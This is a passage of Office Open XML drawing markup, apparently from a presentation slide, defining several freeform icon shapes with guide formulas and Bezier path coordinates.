                  <a:gd name="T15" fmla="*/ 128 h 128"/>
                  <a:gd name="T16" fmla="*/ 5 w 127"/>
                  <a:gd name="T17" fmla="*/ 128 h 128"/>
                  <a:gd name="T18" fmla="*/ 49 w 127"/>
                  <a:gd name="T19" fmla="*/ 93 h 128"/>
                  <a:gd name="T20" fmla="*/ 72 w 127"/>
                  <a:gd name="T21" fmla="*/ 116 h 128"/>
                  <a:gd name="T22" fmla="*/ 72 w 127"/>
                  <a:gd name="T23" fmla="*/ 88 h 128"/>
                  <a:gd name="T24" fmla="*/ 103 w 127"/>
                  <a:gd name="T25" fmla="*/ 61 h 128"/>
                  <a:gd name="T26" fmla="*/ 114 w 127"/>
                  <a:gd name="T27" fmla="*/ 72 h 128"/>
                  <a:gd name="T28" fmla="*/ 127 w 127"/>
                  <a:gd name="T29" fmla="*/ 61 h 128"/>
                  <a:gd name="T30" fmla="*/ 67 w 127"/>
                  <a:gd name="T31" fmla="*/ 0 h 128"/>
                  <a:gd name="T32" fmla="*/ 55 w 127"/>
                  <a:gd name="T33" fmla="*/ 69 h 128"/>
                  <a:gd name="T34" fmla="*/ 47 w 127"/>
                  <a:gd name="T35" fmla="*/ 61 h 128"/>
                  <a:gd name="T36" fmla="*/ 75 w 127"/>
                  <a:gd name="T37" fmla="*/ 33 h 128"/>
                  <a:gd name="T38" fmla="*/ 83 w 127"/>
                  <a:gd name="T39" fmla="*/ 41 h 128"/>
                  <a:gd name="T40" fmla="*/ 55 w 127"/>
                  <a:gd name="T41" fmla="*/ 69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7" h="128">
                    <a:moveTo>
                      <a:pt x="67" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="55" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="55" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5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39" name="Freeform 179">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3756E1-B568-45FE-837E-91F8A51276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68614" y="4354682"/>
                <a:ext cx="182032" cy="185946"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                  <a:gd name="T1" fmla="*/ 29 h 58"/>
                  <a:gd name="T2" fmla="*/ 28 w 57"/>
                  <a:gd name="T3" fmla="*/ 58 h 58"/>
                  <a:gd name="T4" fmla="*/ 0 w 57"/>
                  <a:gd name="T5" fmla="*/ 29 h 58"/>
                  <a:gd name="T6" fmla="*/ 28 w 57"/>
                  <a:gd name="T7" fmla="*/ 0 h 58"/>
                  <a:gd name="T8" fmla="*/ 57 w 57"/>
                  <a:gd name="T9" fmla="*/ 29 h 58"/>
                  <a:gd name="T10" fmla="*/ 5 w 57"/>
                  <a:gd name="T11" fmla="*/ 29 h 58"/>
                  <a:gd name="T12" fmla="*/ 28 w 57"/>
                  <a:gd name="T13" fmla="*/ 52 h 58"/>
                  <a:gd name="T14" fmla="*/ 52 w 57"/>
                  <a:gd name="T15" fmla="*/ 29 h 58"/>
                  <a:gd name="T16" fmla="*/ 28 w 57"/>
                  <a:gd name="T17" fmla="*/ 6 h 58"/>
                  <a:gd name="T18" fmla="*/ 5 w 57"/>
                  <a:gd name="T19" fmla="*/ 29 h 58"/>
                  <a:gd name="T20" fmla="*/ 31 w 57"/>
                  <a:gd name="T21" fmla="*/ 12 h 58"/>
                  <a:gd name="T22" fmla="*/ 45 w 57"/>
                  <a:gd name="T23" fmla="*/ 26 h 58"/>
                  <a:gd name="T24" fmla="*/ 45 w 57"/>
                  <a:gd name="T25" fmla="*/ 31 h 58"/>
                  <a:gd name="T26" fmla="*/ 40 w 57"/>
                  <a:gd name="T27" fmla="*/ 31 h 58"/>
                  <a:gd name="T28" fmla="*/ 32 w 57"/>
                  <a:gd name="T29" fmla="*/ 23 h 58"/>
                  <a:gd name="T30" fmla="*/ 32 w 57"/>
                  <a:gd name="T31" fmla="*/ 43 h 58"/>
                  <a:gd name="T32" fmla="*/ 28 w 57"/>
                  <a:gd name="T33" fmla="*/ 47 h 58"/>
                  <a:gd name="T34" fmla="*/ 25 w 57"/>
                  <a:gd name="T35" fmla="*/ 43 h 58"/>
                  <a:gd name="T36" fmla="*/ 25 w 57"/>
                  <a:gd name="T37" fmla="*/ 23 h 58"/>
                  <a:gd name="T38" fmla="*/ 17 w 57"/>
                  <a:gd name="T39" fmla="*/ 31 h 58"/>
                  <a:gd name="T40" fmla="*/ 12 w 57"/>
                  <a:gd name="T41" fmla="*/ 31 h 58"/>
                  <a:gd name="T42" fmla="*/ 11 w 57"/>
                  <a:gd name="T43" fmla="*/ 29 h 58"/>
                  <a:gd name="T44" fmla="*/ 12 w 57"/>
                  <a:gd name="T45" fmla="*/ 26 h 58"/>
                  <a:gd name="T46" fmla="*/ 26 w 57"/>
                  <a:gd name="T47" fmla="*/ 12 h 58"/>
                  <a:gd name="T48" fmla="*/ 31 w 57"/>
                  <a:gd name="T49" fmla="*/ 1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" h="58">
                    <a:moveTo>
                      <a:pt x="57" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="45"/>
                      <a:pt x="44" y="58"/>
                      <a:pt x="28" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="58"/>
                      <a:pt x="0" y="45"/>
                      <a:pt x="0" y="29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4" y="0"/>
                      <a:pt x="57" y="13"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="5" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="42"/>
                      <a:pt x="16" y="52"/>
                      <a:pt x="28" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="52"/>
                      <a:pt x="52" y="42"/>
                      <a:pt x="52" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="16"/>
                      <a:pt x="41" y="6"/>
                      <a:pt x="28" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="6"/>
                      <a:pt x="5" y="16"/>
                      <a:pt x="5" y="29"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="31" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="26"/>
                      <a:pt x="45" y="26"/>
                      <a:pt x="45" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="28"/>
                      <a:pt x="47" y="30"/>
                      <a:pt x="45" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="33"/>
                      <a:pt x="42" y="33"/>
                      <a:pt x="40" y="31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5"/>
                      <a:pt x="30" y="47"/>
                      <a:pt x="28" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="47"/>
                      <a:pt x="25" y="45"/>
                      <a:pt x="25" y="4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15" y="33"/>
                      <a:pt x="13" y="33"/>
                      <a:pt x="12" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="31"/>
                      <a:pt x="11" y="30"/>
                      <a:pt x="11" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="28"/>
                      <a:pt x="11" y="27"/>
                      <a:pt x="12" y="2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7" y="11"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="3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0" name="Freeform 185">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F81A93E7-3D87-40B3-B3C8-988F771153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58652" y="3260536"/>
                <a:ext cx="287728" cy="160501"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 83 w 90"/>
                  <a:gd name="T1" fmla="*/ 46 h 50"/>
                  <a:gd name="T2" fmla="*/ 85 w 90"/>
                  <a:gd name="T3" fmla="*/ 36 h 50"/>
                  <a:gd name="T4" fmla="*/ 87 w 90"/>
                  <a:gd name="T5" fmla="*/ 27 h 50"/>
                  <a:gd name="T6" fmla="*/ 89 w 90"/>
                  <a:gd name="T7" fmla="*/ 16 h 50"/>
                  <a:gd name="T8" fmla="*/ 86 w 90"/>
                  <a:gd name="T9" fmla="*/ 10 h 50"/>
                  <a:gd name="T10" fmla="*/ 64 w 90"/>
                  <a:gd name="T11" fmla="*/ 1 h 50"/>
                  <a:gd name="T12" fmla="*/ 57 w 90"/>
                  <a:gd name="T13" fmla="*/ 3 h 50"/>
                  <a:gd name="T14" fmla="*/ 52 w 90"/>
                  <a:gd name="T15" fmla="*/ 13 h 50"/>
                  <a:gd name="T16" fmla="*/ 51 w 90"/>
                  <a:gd name="T17" fmla="*/ 14 h 50"/>
                  <a:gd name="T18" fmla="*/ 15 w 90"/>
                  <a:gd name="T19" fmla="*/ 6 h 50"/>
                  <a:gd name="T20" fmla="*/ 0 w 90"/>
                  <a:gd name="T21" fmla="*/ 13 h 50"/>
                  <a:gd name="T22" fmla="*/ 8 w 90"/>
                  <a:gd name="T23" fmla="*/ 25 h 50"/>
                  <a:gd name="T24" fmla="*/ 12 w 90"/>
                  <a:gd name="T25" fmla="*/ 22 h 50"/>
                  <a:gd name="T26" fmla="*/ 17 w 90"/>
                  <a:gd name="T27" fmla="*/ 30 h 50"/>
                  <a:gd name="T28" fmla="*/ 25 w 90"/>
                  <a:gd name="T29" fmla="*/ 25 h 50"/>
                  <a:gd name="T30" fmla="*/ 30 w 90"/>
                  <a:gd name="T31" fmla="*/ 33 h 50"/>
                  <a:gd name="T32" fmla="*/ 38 w 90"/>
                  <a:gd name="T33" fmla="*/ 28 h 50"/>
                  <a:gd name="T34" fmla="*/ 43 w 90"/>
                  <a:gd name="T35" fmla="*/ 35 h 50"/>
                  <a:gd name="T36" fmla="*/ 47 w 90"/>
                  <a:gd name="T37" fmla="*/ 33 h 50"/>
                  <a:gd name="T38" fmla="*/ 47 w 90"/>
                  <a:gd name="T39" fmla="*/ 34 h 50"/>
                  <a:gd name="T40" fmla="*/ 48 w 90"/>
                  <a:gd name="T41" fmla="*/ 45 h 50"/>
                  <a:gd name="T42" fmla="*/ 54 w 90"/>
                  <a:gd name="T43" fmla="*/ 50 h 50"/>
                  <a:gd name="T44" fmla="*/ 78 w 90"/>
                  <a:gd name="T45" fmla="*/ 50 h 50"/>
                  <a:gd name="T46" fmla="*/ 83 w 90"/>
                  <a:gd name="T47" fmla="*/ 46 h 50"/>
                  <a:gd name="T48" fmla="*/ 17 w 90"/>
                  <a:gd name="T49" fmla="*/ 15 h 50"/>
                  <a:gd name="T50" fmla="*/ 18 w 90"/>
                  <a:gd name="T51" fmla="*/ 11 h 50"/>
                  <a:gd name="T52" fmla="*/ 49 w 90"/>
                  <a:gd name="T53" fmla="*/ 17 h 50"/>
                  <a:gd name="T54" fmla="*/ 48 w 90"/>
                  <a:gd name="T55" fmla="*/ 22 h 50"/>
                  <a:gd name="T56" fmla="*/ 17 w 90"/>
                  <a:gd name="T57" fmla="*/ 15 h 50"/>
                  <a:gd name="T58" fmla="*/ 73 w 90"/>
                  <a:gd name="T59" fmla="*/ 45 h 50"/>
                  <a:gd name="T60" fmla="*/ 69 w 90"/>
                  <a:gd name="T61" fmla="*/ 44 h 50"/>
                  <a:gd name="T62" fmla="*/ 67 w 90"/>
                  <a:gd name="T63" fmla="*/ 41 h 50"/>
                  <a:gd name="T64" fmla="*/ 73 w 90"/>
                  <a:gd name="T65" fmla="*/ 14 h 50"/>
                  <a:gd name="T66" fmla="*/ 75 w 90"/>
                  <a:gd name="T67" fmla="*/ 12 h 50"/>
                  <a:gd name="T68" fmla="*/ 80 w 90"/>
                  <a:gd name="T69" fmla="*/ 13 h 50"/>
                  <a:gd name="T70" fmla="*/ 82 w 90"/>
                  <a:gd name="T71" fmla="*/ 16 h 50"/>
                  <a:gd name="T72" fmla="*/ 76 w 90"/>
                  <a:gd name="T73" fmla="*/ 43 h 50"/>
                  <a:gd name="T74" fmla="*/ 73 w 90"/>
                  <a:gd name="T75" fmla="*/ 4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0" h="50">
                    <a:moveTo>
                      <a:pt x="83" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="36"/>
                      <a:pt x="85" y="36"/>
                      <a:pt x="85" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="33"/>
                      <a:pt x="87" y="29"/>
                      <a:pt x="87" y="27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90" y="14"/>
                      <a:pt x="88" y="11"/>
                      <a:pt x="86" y="10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62" y="0"/>
                      <a:pt x="59" y="1"/>
                      <a:pt x="57" y="3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1" y="13"/>
                      <a:pt x="51" y="13"/>
                      <a:pt x="51" y="14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33"/>
                      <a:pt x="47" y="34"/>
                      <a:pt x="47" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="45"/>
                      <a:pt x="48" y="45"/>
                      <a:pt x="48" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="48"/>
                      <a:pt x="51" y="50"/>
                      <a:pt x="54" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="50"/>
                      <a:pt x="78" y="50"/>
                      <a:pt x="78" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="50"/>
                      <a:pt x="83" y="48"/>
                      <a:pt x="83" y="46"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="15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49" y="17"/>
                      <a:pt x="49" y="17"/>
                      <a:pt x="49" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="22"/>
                      <a:pt x="48" y="22"/>
                      <a:pt x="48" y="22"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="44"/>
                      <a:pt x="69" y="44"/>
                      <a:pt x="69" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="44"/>
                      <a:pt x="67" y="42"/>
                      <a:pt x="67" y="41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3"/>
                      <a:pt x="74" y="12"/>
                      <a:pt x="75" y="12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3"/>
                      <a:pt x="82" y="15"/>
                      <a:pt x="82" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="43"/>
                      <a:pt x="76" y="43"/>
                      <a:pt x="76" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="44"/>
                      <a:pt x="74" y="45"/>
                      <a:pt x="73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1" name="Freeform 186">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D851BBBB-10DD-4A46-ABD1-F764A58EA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96565" y="835405"/>
                <a:ext cx="207477" cy="205519"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 32 h 64"/>
                  <a:gd name="T2" fmla="*/ 65 w 65"/>
                  <a:gd name="T3" fmla="*/ 32 h 64"/>
                  <a:gd name="T4" fmla="*/ 51 w 65"/>
                  <a:gd name="T5" fmla="*/ 42 h 64"/>
                  <a:gd name="T6" fmla="*/ 60 w 65"/>
                  <a:gd name="T7" fmla="*/ 34 h 64"/>
                  <a:gd name="T8" fmla="*/ 51 w 65"/>
                  <a:gd name="T9" fmla="*/ 42 h 64"/>
                  <a:gd name="T10" fmla="*/ 13 w 65"/>
                  <a:gd name="T11" fmla="*/ 30 h 64"/>
                  <a:gd name="T12" fmla="*/ 7 w 65"/>
                  <a:gd name="T13" fmla="*/ 21 h 64"/>
                  <a:gd name="T14" fmla="*/ 46 w 65"/>
                  <a:gd name="T15" fmla="*/ 21 h 64"/>
                  <a:gd name="T16" fmla="*/ 35 w 65"/>
                  <a:gd name="T17" fmla="*/ 30 h 64"/>
                  <a:gd name="T18" fmla="*/ 46 w 65"/>
                  <a:gd name="T19" fmla="*/ 21 h 64"/>
                  <a:gd name="T20" fmla="*/ 35 w 65"/>
                  <a:gd name="T21" fmla="*/ 4 h 64"/>
                  <a:gd name="T22" fmla="*/ 42 w 65"/>
                  <a:gd name="T23" fmla="*/ 11 h 64"/>
                  <a:gd name="T24" fmla="*/ 35 w 65"/>
                  <a:gd name="T25" fmla="*/ 17 h 64"/>
                  <a:gd name="T26" fmla="*/ 27 w 65"/>
                  <a:gd name="T27" fmla="*/ 6 h 64"/>
                  <a:gd name="T28" fmla="*/ 30 w 65"/>
                  <a:gd name="T29" fmla="*/ 17 h 64"/>
                  <a:gd name="T30" fmla="*/ 23 w 65"/>
                  <a:gd name="T31" fmla="*/ 11 h 64"/>
                  <a:gd name="T32" fmla="*/ 30 w 65"/>
                  <a:gd name="T33" fmla="*/ 30 h 64"/>
                  <a:gd name="T34" fmla="*/ 19 w 65"/>
                  <a:gd name="T35" fmla="*/ 21 h 64"/>
                  <a:gd name="T36" fmla="*/ 7 w 65"/>
                  <a:gd name="T37" fmla="*/ 42 h 64"/>
                  <a:gd name="T38" fmla="*/ 13 w 65"/>
                  <a:gd name="T39" fmla="*/ 34 h 64"/>
                  <a:gd name="T40" fmla="*/ 7 w 65"/>
                  <a:gd name="T41" fmla="*/ 42 h 64"/>
                  <a:gd name="T42" fmla="*/ 30 w 65"/>
                  <a:gd name="T43" fmla="*/ 34 h 64"/>
                  <a:gd name="T44" fmla="*/ 19 w 65"/>
                  <a:gd name="T45" fmla="*/ 42 h 64"/>
                  <a:gd name="T46" fmla="*/ 30 w 65"/>
                  <a:gd name="T47" fmla="*/ 47 h 64"/>
                  <a:gd name="T48" fmla="*/ 27 w 65"/>
                  <a:gd name="T49" fmla="*/ 58 h 64"/>
                  <a:gd name="T50" fmla="*/ 20 w 65"/>
                  <a:gd name="T51" fmla="*/ 47 h 64"/>
                  <a:gd name="T52" fmla="*/ 42 w 65"/>
                  <a:gd name="T53" fmla="*/ 52 h 64"/>
                  <a:gd name="T54" fmla="*/ 35 w 65"/>
                  <a:gd name="T55" fmla="*/ 59 h 64"/>
                  <a:gd name="T56" fmla="*/ 45 w 65"/>
                  <a:gd name="T57" fmla="*/ 47 h 64"/>
                  <a:gd name="T58" fmla="*/ 35 w 65"/>
                  <a:gd name="T59" fmla="*/ 42 h 64"/>
                  <a:gd name="T60" fmla="*/ 47 w 65"/>
                  <a:gd name="T61" fmla="*/ 34 h 64"/>
                  <a:gd name="T62" fmla="*/ 35 w 65"/>
                  <a:gd name="T63" fmla="*/ 42 h 64"/>
                  <a:gd name="T64" fmla="*/ 51 w 65"/>
                  <a:gd name="T65" fmla="*/ 21 h 64"/>
                  <a:gd name="T66" fmla="*/ 60 w 65"/>
                  <a:gd name="T67" fmla="*/ 30 h 64"/>
                  <a:gd name="T68" fmla="*/ 56 w 65"/>
                  <a:gd name="T69" fmla="*/ 17 h 64"/>
                  <a:gd name="T70" fmla="*/ 44 w 65"/>
                  <a:gd name="T71" fmla="*/ 7 h 64"/>
                  <a:gd name="T72" fmla="*/ 56 w 65"/>
                  <a:gd name="T73" fmla="*/ 17 h 64"/>
                  <a:gd name="T74" fmla="*/ 20 w 65"/>
                  <a:gd name="T75" fmla="*/ 7 h 64"/>
                  <a:gd name="T76" fmla="*/ 9 w 65"/>
                  <a:gd name="T77" fmla="*/ 17 h 64"/>
                  <a:gd name="T78" fmla="*/ 9 w 65"/>
                  <a:gd name="T79" fmla="*/ 47 h 64"/>
                  <a:gd name="T80" fmla="*/ 20 w 65"/>
                  <a:gd name="T81" fmla="*/ 57 h 64"/>
                  <a:gd name="T82" fmla="*/ 9 w 65"/>
                  <a:gd name="T83" fmla="*/ 47 h 64"/>
                  <a:gd name="T84" fmla="*/ 44 w 65"/>
                  <a:gd name="T85" fmla="*/ 57 h 64"/>
                  <a:gd name="T86" fmla="*/ 56 w 65"/>
                  <a:gd name="T87" fmla="*/ 4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5" h="64">
                    <a:moveTo>
                      <a:pt x="32" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="0"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="49"/>
                      <a:pt x="15" y="64"/>
                      <a:pt x="32" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="64"/>
                      <a:pt x="65" y="49"/>
                      <a:pt x="65" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="14"/>
                      <a:pt x="50" y="0"/>
                      <a:pt x="32" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="51" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="40"/>
                      <a:pt x="52" y="37"/>
                      <a:pt x="52" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="34"/>
                      <a:pt x="60" y="34"/>
                      <a:pt x="60" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="37"/>
                      <a:pt x="59" y="40"/>
                      <a:pt x="58" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="51" y="42"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="14" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="13" y="27"/>
                      <a:pt x="13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27"/>
                      <a:pt x="6" y="24"/>
                      <a:pt x="7" y="21"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="14" y="21"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="24"/>
                      <a:pt x="47" y="27"/>
                      <a:pt x="47" y="3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21"/>
                      <a:pt x="35" y="21"/>
                      <a:pt x="35" y="21"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="46" y="21"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="35" y="17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6" y="5"/>
                      <a:pt x="37" y="5"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="7"/>
                      <a:pt x="41" y="9"/>
                      <a:pt x="42" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="13"/>
                      <a:pt x="44" y="15"/>
                      <a:pt x="45" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="17"/>
                      <a:pt x="35" y="17"/>
                      <a:pt x="35" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="9"/>
                      <a:pt x="26" y="7"/>
                      <a:pt x="27" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="5"/>
                      <a:pt x="29" y="5"/>
                      <a:pt x="30" y="4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1" y="15"/>
                      <a:pt x="22" y="13"/>
                      <a:pt x="23" y="11"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="30" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="30"/>
                      <a:pt x="30" y="30"/>
                      <a:pt x="30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27"/>
                      <a:pt x="18" y="24"/>
                      <a:pt x="19" y="21"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="30" y="21"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="40"/>
                      <a:pt x="5" y="37"/>
                      <a:pt x="5" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="34"/>
                      <a:pt x="13" y="34"/>
                      <a:pt x="13" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="37"/>
                      <a:pt x="14" y="40"/>
                      <a:pt x="14" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="7" y="42"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="18" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="34"/>
                      <a:pt x="30" y="34"/>
                      <a:pt x="30" y="34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8" y="40"/>
                      <a:pt x="18" y="37"/>
                      <a:pt x="18" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="30" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="59"/>
                      <a:pt x="30" y="59"/>
                      <a:pt x="30" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="59"/>
                      <a:pt x="28" y="58"/>
                      <a:pt x="27" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="57"/>
                      <a:pt x="24" y="55"/>
                      <a:pt x="23" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="51"/>
                      <a:pt x="21" y="49"/>
                      <a:pt x="20" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="47"/>
                      <a:pt x="30" y="47"/>
                      <a:pt x="30" y="47"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="42" y="52"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="55"/>
                      <a:pt x="39" y="57"/>
                      <a:pt x="38" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="58"/>
                      <a:pt x="36" y="59"/>
                      <a:pt x="35" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="47"/>
                      <a:pt x="35" y="47"/>
                      <a:pt x="35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4" y="49"/>
                      <a:pt x="43" y="51"/>
                      <a:pt x="42" y="52"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="35" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="34"/>
                      <a:pt x="35" y="34"/>
                      <a:pt x="35" y="34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7"/>
                      <a:pt x="47" y="40"/>
                      <a:pt x="46" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="35" y="42"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="52" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="27"/>
                      <a:pt x="51" y="24"/>
                      <a:pt x="51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9" y="24"/>
                      <a:pt x="60" y="27"/>
                      <a:pt x="60" y="30"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="52" y="30"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="56" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="17"/>
                      <a:pt x="50" y="17"/>
                      <a:pt x="50" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="13"/>
                      <a:pt x="47" y="9"/>
                      <a:pt x="44" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="8"/>
                      <a:pt x="50" y="10"/>
                      <a:pt x="52" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
